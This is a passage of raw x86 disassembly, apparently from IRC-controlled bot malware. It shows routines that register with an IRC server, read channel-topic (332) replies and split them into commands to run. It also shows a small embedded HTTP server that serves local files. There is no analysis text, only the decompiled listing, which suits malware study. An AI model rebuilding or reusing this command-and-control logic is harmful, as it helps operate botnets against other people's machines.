mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, esi
push eax
lea eax, [edi+5]
push eax
lea eax, [ebp+var_44]
push eax
push offset aSSSSSS ; "%s %s %s\r\n%s %s %s\r\n"
call sub_4172CC
add esp, 1Ch
jmp loc_417B68
; ---------------------------------------------------------------------------
loc_417C22: ; CODE XREF: sub_41783D+34A�j
lea ecx, [ebp+var_54]
lea eax, [ebp+var_1062C]
loc_417C2B: ; CODE XREF: sub_41783D+406�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417C49
test dl, dl
jz short loc_417C45
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417C49
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417C2B
loc_417C45: ; CODE XREF: sub_41783D+3F6�j
xor eax, eax
jmp short loc_417C4E
; ---------------------------------------------------------------------------
loc_417C49: ; CODE XREF: sub_41783D+3F2�j
; sub_41783D+3FE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417C4E: ; CODE XREF: sub_41783D+40A�j
test eax, eax
jz short loc_417C6A
push 4
mov edi, offset a332 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_417EEE
loc_417C6A: ; CODE XREF: sub_41783D+413�j
push 8
pop ecx
xor eax, eax
mov [ebp+var_78], 0
lea edi, [ebp+var_77]
rep stosd
mov ebx, 0FFh
push ebx
stosw
xor esi, esi
lea eax, [ebp+var_1AB]
push esi
push eax
mov byte ptr [ebp+var_10730], 0
mov [ebp+var_1AC], 0
call sub_407B70
add esp, 0Ch
push ebx
lea eax, [ebp+var_62B]
push esi
push eax
mov [ebp+var_62C], 0
call sub_407B70
add esp, 0Ch
push ebx
lea eax, [ebp+var_72B]
push esi
push eax
mov [ebp+var_72C], 0
call sub_407B70
add esp, 0Ch
lea eax, [ebp+var_1072C]
push offset asc_42029C ; " :"
push eax
call sub_403A34
push eax
push offset aS_0 ; "%s"
lea eax, [ebp+var_62C]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_62C]
add esp, 18h
lea esi, [eax+1]
loc_417D00: ; CODE XREF: sub_41783D+4C8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D00
sub eax, esi
mov [ebp+eax+var_62C], cl
lea eax, [ebp+var_1072C]
push offset asc_4202A4 ; "!"
push eax
call sub_403A34
push eax
push offset aS_1 ; "%s"
lea eax, [ebp+var_78]
push 22h
push eax
call sub_402AEE
lea eax, [ebp+var_78]
add esp, 18h
lea esi, [eax+1]
loc_417D3B: ; CODE XREF: sub_41783D+503�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D3B
sub eax, esi
mov [ebp+eax+var_78], cl
lea eax, [ebp+var_78]
lea esi, [eax+1]
loc_417D4E: ; CODE XREF: sub_41783D+516�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D4E
sub eax, esi
push eax
lea eax, [ebp+var_77]
push eax
lea eax, [ebp+var_78]
push eax
call sub_403910
add esp, 0Ch
push 4
mov edi, offset a332_0 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_417DB4
lea eax, [ebp+var_1042C]
push eax
push offset aS_2 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417DA1: ; CODE XREF: sub_41783D+569�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417DA1
mov byte ptr [ebp+var_10730], 1
jmp loc_417E41
; ---------------------------------------------------------------------------
loc_417DB4: ; CODE XREF: sub_41783D+53D�j
mov esi, [ebp+var_10734]
add esi, 5
lea eax, [ebp+var_1052C]
loc_417DC3: ; CODE XREF: sub_41783D+59E�j
mov cl, [eax]
cmp cl, [esi]
jnz short loc_417DE1
test cl, cl
jz short loc_417DDD
mov cl, [eax+1]
cmp cl, [esi+1]
jnz short loc_417DE1
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_417DC3
loc_417DDD: ; CODE XREF: sub_41783D+58E�j
xor eax, eax
jmp short loc_417DE6
; ---------------------------------------------------------------------------
loc_417DE1: ; CODE XREF: sub_41783D+58A�j
; sub_41783D+596�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417DE6: ; CODE XREF: sub_41783D+5A2�j
test eax, eax
jnz short loc_417E15
lea eax, [ebp+var_78]
push eax
push offset aS_3 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417E0C: ; CODE XREF: sub_41783D+5D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E0C
jmp short loc_417E41
; ---------------------------------------------------------------------------
loc_417E15: ; CODE XREF: sub_41783D+5AB�j
lea eax, [ebp+var_1052C]
push eax
push offset aS_4 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417E3A: ; CODE XREF: sub_41783D+602�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E3A
loc_417E41: ; CODE XREF: sub_41783D+572�j
; sub_41783D+5D6�j
sub eax, edx
push 100h
lea esi, [ebp+var_72C]
mov ebx, offset byte_425021
mov [ebp+eax+var_1AC], 0
call sub_4196D1
pop ecx
lea eax, [ebp+var_62C]
mov ecx, esi
call sub_419044
test eax, eax
jnz short loc_417E7A
cmp byte ptr [ebp+var_10730], al
jz short loc_417EEE
loc_417E7A: ; CODE XREF: sub_41783D+633�j
xor edi, edi
cmp byte ptr [ebp+var_10730], 0
lea eax, [ebp+var_52C]
jz short loc_417E92
push offset asc_4202BC ; ";"
jmp short loc_417E97
; ---------------------------------------------------------------------------
loc_417E92: ; CODE XREF: sub_41783D+64C�j
push offset asc_4202C0 ; ";"
loc_417E97: ; CODE XREF: sub_41783D+653�j
push eax
call sub_403A34
jmp short loc_417EB3
; ---------------------------------------------------------------------------
loc_417E9F: ; CODE XREF: sub_41783D+67A�j
push offset asc_4202C4 ; ";"
push 0
mov [ebp+edi*4+var_10F34], eax
call sub_403A34
inc edi
loc_417EB3: ; CODE XREF: sub_41783D+660�j
test eax, eax
pop ecx
pop ecx
jnz short loc_417E9F
xor esi, esi
test edi, edi
jle short loc_417EEE
loc_417EBF: ; CODE XREF: sub_41783D+6AF�j
push [ebp+esi*4+var_10F34]
lea eax, [ebp+var_1AC]
push eax
lea eax, [ebp+var_62C]
push eax
lea eax, [ebp+var_78]
push eax
push [ebp+var_10730]
push [ebp+var_10734]
call sub_417676
inc esi
cmp esi, edi
jl short loc_417EBF
loc_417EEE: ; CODE XREF: sub_41783D+2E1�j
; sub_41783D+32D�j ...
mov al, 1
loc_417EF0: ; CODE XREF: sub_41783D+25D�j
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 4
sub_41783D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F01 proc near ; CODE XREF: .kSjx934:0041C039�p
var_20414 = dword ptr -20414h
var_20410 = dword ptr -20410h
var_2040C = dword ptr -2040Ch
var_20408 = byte ptr -20408h
var_408 = byte ptr -408h
var_407 = byte ptr -407h
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 20414h
call sub_411400
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 3FFh
xor ebx, ebx
push esi
lea eax, [ebp+var_407]
mov edi, ecx
push ebx
push eax
mov [ebp+var_20414], edi
mov [ebp+var_408], bl
call sub_407B70
add esp, 0Ch
push ebx
push esi
lea eax, [ebp+var_408]
push eax
push dword ptr [edi]
mov [ebp+var_2040C], ebx
call ds:dword_41D270
test eax, eax
jz loc_418016
lea eax, [ebp+var_408]
lea edx, [eax+1]
loc_417F69: ; CODE XREF: sub_417F01+6D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_417F69
sub eax, edx
mov [ebp+eax+var_408], bl
lea eax, [ebp+var_408]
push offset asc_420238 ; "\r\n"
push eax
call sub_403A34
push 20000h
mov edi, eax
lea eax, [ebp+var_20408]
push ebx
push eax
call sub_407B70
add esp, 14h
cmp edi, ebx
mov esi, 200h
jz short loc_417FEC
lea eax, [ebp+var_20408]
mov [ebp+var_20410], eax
loc_417FB6: ; CODE XREF: sub_417F01+E9�j
push edi
push offset aS_10 ; "%s"
push 1FFh
push [ebp+var_20410]
call sub_402AEE
push offset asc_420240 ; "\r\n"
push ebx
call sub_403A34
add [ebp+var_20410], esi
add esp, 18h
inc [ebp+var_2040C]
mov edi, eax
cmp edi, ebx
jnz short loc_417FB6
loc_417FEC: ; CODE XREF: sub_417F01+A7�j
cmp [ebp+var_2040C], ebx
jle short loc_418012
mov ebx, [ebp+var_2040C]
lea edi, [ebp+var_20408]
loc_418000: ; CODE XREF: sub_417F01+10F�j
push [ebp+var_20414]
mov ecx, edi
call sub_41783D
add edi, esi
dec ebx
jnz short loc_418000
loc_418012: ; CODE XREF: sub_417F01+F1�j
mov al, 1
jmp short loc_418020
; ---------------------------------------------------------------------------
loc_418016: ; CODE XREF: sub_417F01+59�j
push dword ptr [edi]
call ds:dword_41D224
xor al, al
loc_418020: ; CODE XREF: sub_417F01+113�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_417F01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41802F proc near ; CODE XREF: .kSjx934:0041C027�p
var_450 = dword ptr -450h
var_44C = dword ptr -44Ch
var_448 = byte ptr -448h
var_447 = byte ptr -447h
var_444 = byte ptr -444h
var_443 = byte ptr -443h
var_440 = word ptr -440h
var_43E = word ptr -43Eh
var_43C = byte ptr -43Ch
var_430 = byte ptr -430h
var_42F = byte ptr -42Fh
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 454h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 0
push 1
mov edi, ecx
push 2
mov [ebp+var_450], edi
mov ebx, edx
mov [ebp+var_44C], eax
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov [edi], eax
jnz short loc_418079
push eax
loc_41806C: ; CODE XREF: sub_41802F+8B�j
call ds:dword_41D224
xor al, al
jmp loc_41828B
; ---------------------------------------------------------------------------
loc_418079: ; CODE XREF: sub_41802F+3A�j
push 1FFh
lea eax, [ebp+var_22F]
push 0
push eax
mov [ebp+var_230], 0
call sub_407B70
add esp, 0Ch
push 200h
lea esi, [ebp+var_230]
call sub_4196D1
pop ecx
mov eax, esi
push eax
call ds:dword_41D23C
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jnz short loc_4180BC
loc_4180B8: ; CODE XREF: sub_41802F+E7�j
push dword ptr [edi]
jmp short loc_41806C
; ---------------------------------------------------------------------------
loc_4180BC: ; CODE XREF: sub_41802F+87�j
push 200h
lea eax, [ebp+var_230]
push ebx
push eax
call sub_407B70
movsx eax, word ptr [esi+0Ah]
add esp, 0Ch
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_43C]
push eax
call sub_407BF0
add esp, 0Ch
push [ebp+arg_4]
mov [ebp+var_440], 2
call ds:dword_41D278
mov [ebp+var_43E], ax
push 10h
lea eax, [ebp+var_440]
push eax
push dword ptr [edi]
call ds:dword_41D240
test eax, eax
jnz short loc_4180B8
mov eax, [ebp+var_44C]
lea edx, [eax+1]
loc_418121: ; CODE XREF: sub_41802F+F7�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418121
sub eax, edx
jz short loc_418197
xor eax, eax
mov [ebp+var_18], bl
lea edi, [ebp+var_17]
stosd
push 1FFh
stosd
lea eax, [ebp+var_42F]
push ebx
push eax
mov [ebp+var_430], bl
call sub_407B70
mov ebx, [ebp+var_44C]
add esp, 0Ch
push 200h
lea esi, [ebp+var_430]
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_18]
mov ebx, offset byte_425531
call sub_4196D1
mov edi, [ebp+var_450]
pop ecx
lea eax, [ebp+var_430]
push eax
mov eax, esi
push eax
push offset aSS_7 ; "%s %s\r\n"
call sub_4172CC
add esp, 0Ch
xor ebx, ebx
loc_418197: ; CODE XREF: sub_41802F+FB�j
xor eax, eax
mov [ebp+var_24], bl
lea edi, [ebp+var_23]
stosd
stosd
xor eax, eax
mov [ebp+var_30], bl
lea edi, [ebp+var_2F]
stosd
stosd
xor eax, eax
mov [ebp+var_C], bl
lea edi, [ebp+var_B]
stosd
stosw
xor eax, eax
push ebx
mov [ebp+var_448], bl
lea edi, [ebp+var_447]
stosw
push 3
mov [ebp+var_444], bl
lea edi, [ebp+var_443]
pop ecx
lea esi, [ebp+var_448]
stosw
call sub_418E51
pop ecx
push ebx
push 3
lea esi, [ebp+var_444]
call sub_418E1F
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosw
stosb
mov eax, esi
push eax
lea eax, [ebp+var_448]
push eax
push offset aSS_8 ; "%s-%s"
lea eax, [ebp+var_C]
push 6
push eax
call sub_402AEE
lea eax, [ebp+var_C]
add esp, 1Ch
lea esi, [eax+1]
loc_41821E: ; CODE XREF: sub_41802F+1F4�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41821E
sub eax, esi
mov [ebp+eax+var_C], bl
xor eax, eax
lea edi, [ebp+var_448]
stosw
stosb
xor eax, eax
lea edi, [ebp+var_444]
stosw
push 9
lea esi, [ebp+var_24]
mov ebx, offset dword_425528
stosb
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_30]
mov ebx, offset word_42553A
call sub_4196D1
mov edi, [ebp+var_450]
pop ecx
lea ebx, [edi+5]
call sub_41748B
push ebx
lea eax, [ebp+var_C]
push eax
mov eax, esi
push eax
push ebx
lea eax, [ebp+var_24]
push eax
push offset aSSSS00S ; "%s %s\r\n%s %s 0 0 :%s\r\n"
call sub_4172CC
add esp, 18h
mov al, 1
loc_41828B: ; CODE XREF: sub_41802F+45�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 8
sub_41802F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41829C proc near ; CODE XREF: sub_418301+3E�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov [ebp+var_10], eax
xor eax, eax
mov [ebp+var_C], 0
lea edi, [ebp+var_B]
push 5
lea esi, [ebp+var_C]
mov ebx, offset dword_425528
stosd
call sub_4196D1
mov ebx, [ebp+var_10]
pop ecx
add ebx, 5
call sub_41748B
push ebx
mov eax, esi
push eax
push offset aSS_6 ; "%s %s\r\n"
mov edi, offset dword_4269BC
call sub_4172CC
mov ecx, [ebp+var_4]
add esp, 0Ch
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 4
sub_41829C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_418301 proc near ; DATA XREF: .kSjx934:0041BF7C�o
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
push esi
push edi
call sub_418DA0
mov edi, ds:dword_426598
mov esi, ds:dword_42659C
loc_41831A: ; CODE XREF: sub_418301+5A�j
call sub_418DA0
cmp ds:dword_42659C, esi
jl short loc_418344
jg short loc_418331
cmp ds:dword_426598, edi
jbe short loc_418344
loc_418331: ; CODE XREF: sub_418301+26�j
cmp ds:byte_4269C0, 0
jz short loc_418344
push offset dword_4269BC
call sub_41829C
loc_418344: ; CODE XREF: sub_418301+24�j
; sub_418301+2E�j ...
mov edi, ds:dword_426598
mov esi, ds:dword_42659C
push 0C350h
call ds:dword_41D0FC
jmp short loc_41831A
sub_418301 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41835D proc near ; CODE XREF: sub_418AEB+1E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push offset word_426694
push ds:dword_4267AC
mov [ebp+var_4], 10h
call ds:dword_41D234
leave
retn
sub_41835D endp
; =============== S U B R O U T I N E =======================================
sub_41837F proc near ; CODE XREF: sub_418552+1D2�p
arg_0 = dword ptr 4
jmp short loc_418384
; ---------------------------------------------------------------------------
loc_418381: ; CODE XREF: sub_41837F+14�j
mov byte ptr [eax], 5Ch
loc_418384: ; CODE XREF: sub_41837F�j
push 2Fh
push [esp+4+arg_0]
call sub_403850
test eax, eax
pop ecx
pop ecx
jnz short loc_418381
retn
sub_41837F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418396 proc near ; CODE XREF: sub_418552+192�p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_2 = byte ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
mov eax, esi
push edi
lea ecx, [eax+1]
loc_4183A7: ; CODE XREF: sub_418396+16�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4183A7
sub eax, ecx
inc eax
push eax
call sub_402648
mov ebx, eax
push ebx
call sub_402A45
push eax
push 0
push ebx
call sub_407B70
push 25h
push esi
call sub_403850
add esp, 1Ch
test eax, eax
jnz short loc_418420
loc_4183D7: ; CODE XREF: sub_418396+114�j
mov eax, esi
mov edx, esi
loc_4183DB: ; CODE XREF: sub_418396+4A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4183DB
mov edi, ebx
sub eax, edx
dec edi
loc_4183E7: ; CODE XREF: sub_418396+57�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4183E7
mov ecx, eax
shr ecx, 2
mov esi, edx
mov edx, [ebp+arg_0]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov edi, edx
stosd
mov eax, ebx
sub edx, ebx
loc_41840B: ; CODE XREF: sub_418396+7D�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_41840B
xor esi, esi
inc esi
jmp loc_4184B1
; ---------------------------------------------------------------------------
loc_41841D: ; CODE XREF: sub_418396+10E�j
mov eax, [ebp+var_8]
loc_418420: ; CODE XREF: sub_418396+3F�j
mov byte ptr [eax], 0
mov ecx, esi
loc_418425: ; CODE XREF: sub_418396+94�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_418425
sub ecx, esi
mov edi, ebx
mov edx, ecx
dec edi
loc_418433: ; CODE XREF: sub_418396+A3�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_418433
mov ecx, edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
inc eax
push 2
push eax
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
rep movsb
call sub_403910
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push offset asc_4204B4 ; "%x"
push eax
mov [ebp+var_2], 0
call sub_4035E4
add esp, 18h
test eax, eax
jz short loc_4184AF
mov eax, ebx
lea esi, [eax+1]
loc_41847B: ; CODE XREF: sub_418396+EA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41847B
mov cl, [ebp+var_C]
sub eax, esi
mov esi, [ebp+var_8]
add esi, 2
push 25h
push esi
mov [eax+ebx], cl
mov byte ptr [eax+ebx+1], 0
call sub_403850
test eax, eax
pop ecx
pop ecx
mov [ebp+var_8], eax
jnz loc_41841D
jmp loc_4183D7
; ---------------------------------------------------------------------------
loc_4184AF: ; CODE XREF: sub_418396+DE�j
xor esi, esi
loc_4184B1: ; CODE XREF: sub_418396+82�j
push ebx
call sub_402B9B
pop ecx
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_418396 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4184BF proc near ; CODE XREF: sub_418552+A1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov [eax], esi
mov eax, [ebp+arg_4]
push edi
mov [eax], esi
mov eax, [ebp+arg_8]
push offset asc_42049C ; "\r\n"
push esi
mov [ebx], esi
mov [eax], esi
call sub_4037B0
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_4184EB
loc_4184E7: ; CODE XREF: sub_4184BF+52�j
; sub_4184BF+69�j ...
xor eax, eax
jmp short loc_41854F
; ---------------------------------------------------------------------------
loc_4184EB: ; CODE XREF: sub_4184BF+26�j
push offset asc_4204A0 ; " "
push esi
mov byte ptr [edi], 0
call sub_403A34
mov ecx, [ebp+arg_0]
push offset asc_4204A4 ; " "
push 0
mov [ecx], eax
call sub_403A34
add esp, 10h
test eax, eax
mov [ebx], eax
jz short loc_4184E7
push offset asc_4204A8 ; " "
push 0
call sub_403A34
test eax, eax
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
jz short loc_4184E7
mov ecx, [ebp+arg_8]
lea eax, [edi+2]
cmp byte ptr [eax], 0
mov [ecx], eax
jz short loc_41854C
push offset asc_4204AC ; "\r\n\r\n"
push eax
call sub_4037B0
test eax, eax
pop ecx
pop ecx
jz short loc_4184E7
mov byte ptr [eax+2], 0
loc_41854C: ; CODE XREF: sub_4184BF+76�j
xor eax, eax
inc eax
loc_41854F: ; CODE XREF: sub_4184BF+2A�j
pop edi
pop ebp
retn
sub_4184BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CA8h
sub_418552 proc near ; CODE XREF: sub_418AEB+28�p
var_D28 = dword ptr -0D28h
var_D24 = dword ptr -0D24h
var_D20 = dword ptr -0D20h
var_D1C = dword ptr -0D1Ch
var_D18 = byte ptr -0D18h
var_D14 = byte ptr -0D14h
var_D13 = byte ptr -0D13h
var_D12 = byte ptr -0D12h
var_D11 = byte ptr -0D11h
var_D08 = byte ptr -0D08h
var_D07 = byte ptr -0D07h
var_908 = byte ptr -908h
var_907 = byte ptr -907h
var_508 = byte ptr -508h
var_507 = byte ptr -507h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-0CA8h]
sub esp, 0D28h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+0CA8h+var_4], eax
push ebx
push esi
mov esi, 3FFh
xor ebx, ebx
push esi
lea eax, [ebp+0CA8h+var_907]
push ebx
push eax
mov [ebp+0CA8h+var_908], bl
call sub_407B70
push esi
lea eax, [ebp+0CA8h+var_507]
push ebx
push eax
mov [ebp+0CA8h+var_508], bl
call sub_407B70
push 103h
lea eax, [ebp+0CA8h+var_107]
push ebx
push eax
mov [ebp+0CA8h+var_108], bl
call sub_407B70
push esi
lea eax, [ebp+0CA8h+var_D07]
push ebx
push eax
mov [ebp+0CA8h+var_D08], bl
call sub_407B70
add esp, 30h
push ebx
push 400h
lea eax, [ebp+0CA8h+var_D08]
push eax
push [ebp+0CA8h+arg_0]
call ds:dword_41D270
mov [ebp+eax+0CA8h+var_D08], bl
lea eax, [ebp+0CA8h+var_D1C]
push eax
lea eax, [ebp+0CA8h+var_D20]
push eax
lea eax, [ebp+0CA8h+var_D28]
push eax
lea ebx, [ebp+0CA8h+var_D24]
lea esi, [ebp+0CA8h+var_D08]
call sub_4184BF
add esp, 0Ch
test eax, eax
jz loc_418AD4
mov esi, [ebp+0CA8h+var_D28]
push edi
push 4
mov edi, offset aGet ; "GET"
pop ecx
xor eax, eax
repe cmpsb
jz loc_4186E0
push offset aQue?_1 ; "Que?"
mov esi, 3FFh
lea eax, [ebp+0CA8h+var_908]
push esi
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_908]
add esp, 0Ch
lea edx, [eax+1]
loc_41863C: ; CODE XREF: sub_418552+EF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41863C
sub eax, edx
xor ebx, ebx
mov [ebp+eax+0CA8h+var_908], bl
lea eax, [ebp+0CA8h+var_908]
lea ecx, [eax+1]
loc_418657: ; CODE XREF: sub_418552+10A�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418657
sub eax, ecx
push eax
push offset aHttp1_1501NotI ; "HTTP/1.1 501 Not Implemented\r\nContent-L"...
lea eax, [ebp+0CA8h+var_508]
push esi
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_508]
add esp, 10h
lea ecx, [eax+1]
loc_41867F: ; CODE XREF: sub_418552+132�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41867F
sub eax, ecx
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea ecx, [eax+1]
loc_418698: ; CODE XREF: sub_418552+14B�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418698
mov esi, ds:dword_41D228
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi
lea eax, [ebp+0CA8h+var_908]
lea ecx, [eax+1]
loc_4186C1: ; CODE XREF: sub_418552+174�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4186C1
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+var_908]
push eax
push [ebp+0CA8h+arg_0]
call esi
jmp loc_418AC7
; ---------------------------------------------------------------------------
loc_4186E0: ; CODE XREF: sub_418552+C1�j
mov edi, [ebp+0CA8h+var_D24]
push edi
call sub_418396
test eax, eax
pop ecx
jz loc_418AD3
mov eax, edi
lea edx, [eax+1]
loc_4186F7: ; CODE XREF: sub_418552+1AA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4186F7
sub eax, edx
cmp eax, 1
jbe loc_418849
inc edi
push 2Fh
push edi
call sub_403850
mov esi, eax
xor ebx, ebx
cmp esi, ebx
pop ecx
pop ecx
jz loc_4187A6
mov [esi], bl
inc esi
push esi
call sub_41837F
push ebx
push esi
call sub_403850
add esp, 0Ch
cmp [esi], bl
jz short loc_41876F
cmp byte ptr [eax-1], 5Ch
jz short loc_41876F
push esi
push edi
push offset dword_4266A8
push offset aSSS ; "%s\\%s\\%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 18h
lea esi, [eax+1]
loc_418766: ; CODE XREF: sub_418552+219�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418766
jmp short loc_4187D5
; ---------------------------------------------------------------------------
loc_41876F: ; CODE XREF: sub_418552+1E3�j
; sub_418552+1E9�j
push offset dword_4268B8
push esi
push edi
push offset dword_4266A8
push offset aSSSS ; "%s\\%s\\%s%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 1Ch
lea esi, [eax+1]
loc_41879D: ; CODE XREF: sub_418552+250�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41879D
jmp short loc_4187D5
; ---------------------------------------------------------------------------
loc_4187A6: ; CODE XREF: sub_418552+1C8�j
push edi
push offset dword_4266A8
push offset aSS_4 ; "%s\\%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 14h
lea esi, [eax+1]
loc_4187CE: ; CODE XREF: sub_418552+281�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4187CE
loc_4187D5: ; CODE XREF: sub_418552+21B�j
; sub_418552+252�j
sub eax, esi
mov [ebp+eax+0CA8h+var_108], bl
lea eax, [ebp+0CA8h+var_108]
push eax
push offset byte_4267B0
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41884B
mov esi, 200h
push esi
call sub_4036E0
push esi
mov edi, eax
push ebx
push edi
mov [ebp+0CA8h+var_D20], edi
call sub_407B70
add esp, 10h
push offset aQue?_0 ; "Que?"
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_41882C: ; CODE XREF: sub_418552+2DF�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41882C
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_41883D: ; CODE XREF: sub_418552+2F0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41883D
jmp loc_41892E
; ---------------------------------------------------------------------------
loc_418849: ; CODE XREF: sub_418552+1B1�j
xor ebx, ebx
loc_41884B: ; CODE XREF: sub_418552+2A1�j
push ebx
push ebx
push 3
push ebx
push 1
push 80000000h
lea eax, [ebp+0CA8h+var_108]
push eax
call ds:dword_41D06C
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+0CA8h+var_D24], esi
jz short loc_4188DF
push ebx
push esi
call ds:dword_41D070
mov edi, eax
push edi
mov [ebp+0CA8h+var_D1C], edi
call sub_4036E0
push edi
push ebx
